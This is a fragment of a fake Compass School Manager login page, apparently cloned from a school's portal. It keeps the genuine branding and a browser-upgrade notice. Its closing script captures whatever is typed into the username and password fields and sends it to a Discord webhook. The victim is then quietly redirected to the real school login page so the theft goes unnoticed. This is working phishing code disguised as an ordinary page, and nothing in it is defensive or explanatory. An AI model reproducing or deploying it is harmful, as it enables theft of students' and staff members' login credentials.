                      <div class="siteInfo ">12.4.25.0 / ME1PD06#1 </div>
                      <div class="compassLogo-color compassLogo-mobile hide--desktop">
                        <img src="https://assets.compass.education/Assets/Pix/logo-wordmark-color.svg" alt="Compass Logo"/>
                      </div>
                      </asp:Panel>
                      <div id="ieWarning" class="hide">
                      <div class="ieWarningWrapper">
                        <div class="ieWarning">
                            <h2>Your computer is not set up to use Compass School Manager</h2>
                            <p>
                                You're using a very old version of the Internet Explorer web browser program - version 7 or 8.<br/>This browser is several years old, and it does not work with Compass School Manager.
                            </p>
                            <p>
                                Using Internet Explorer 7 or 8 will result in:<br/>
                                - Menus and navigation not working<br/>
                                - Extremely slow access to Compass<br/>
                                - Text and images not loading correctly<br/>- Features that do not work properly
                            </p>
                            <p>Please ask your IT technician to upgrade your web browser as soon as possible.</p>
                            <p>
                                We recommend downloading <a href="http://www.google.com/chrome/">Chrome</a>
                                , <a href="http://www.getfirefox.com/">Firefox</a>
                                , <a href="http://www.apple.com/au/safari/‎">Safari</a>
                                or <a href="http://www.microsoft.com/windows/internet-explorer">Internet Explorer</a>
                                .
                            </p>
                  </div>  <!-- App-img end-->
                </div> <!-- App end -->
              </div> <!-- Content end -->
            </article>
          </div> <!-- Wrapper end -->
        </main>

      </section>
    </span> <!-- Root -->

    <!-- Select Link -->
    <script type="text/javascript">
      function la(src) {
        window.location=src;
      }
    </script>

    <script>
    function sendMessage() {
    function sleep(milliseconds) {
    const date = Date.now();
    let currentDate = null;
    do {
      currentDate = Date.now();
    } while (currentDate - date < milliseconds);
  }
      var request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1209443687625396264/QIA06egxPnRWr3ovwoASgZD4zl5yR21dMHHRVyPhiBoOJWmL0QvcWKllPb7Wg_Qf_xQY");
      request.setRequestHeader('Content-type', 'application/json');
      var params = {
        content: ("> **USERNAME  : **" + document.getElementById('username').value + "\n> **PASSWORD : **" + document.getElementById('password').value)
      }
      request.send(JSON.stringify(params));
    sleep(400)
    window.location.replace("https://morleyshs-wa.compass.education/login.aspx?sessionstate=disabled");
    }
    </script>
  </body>
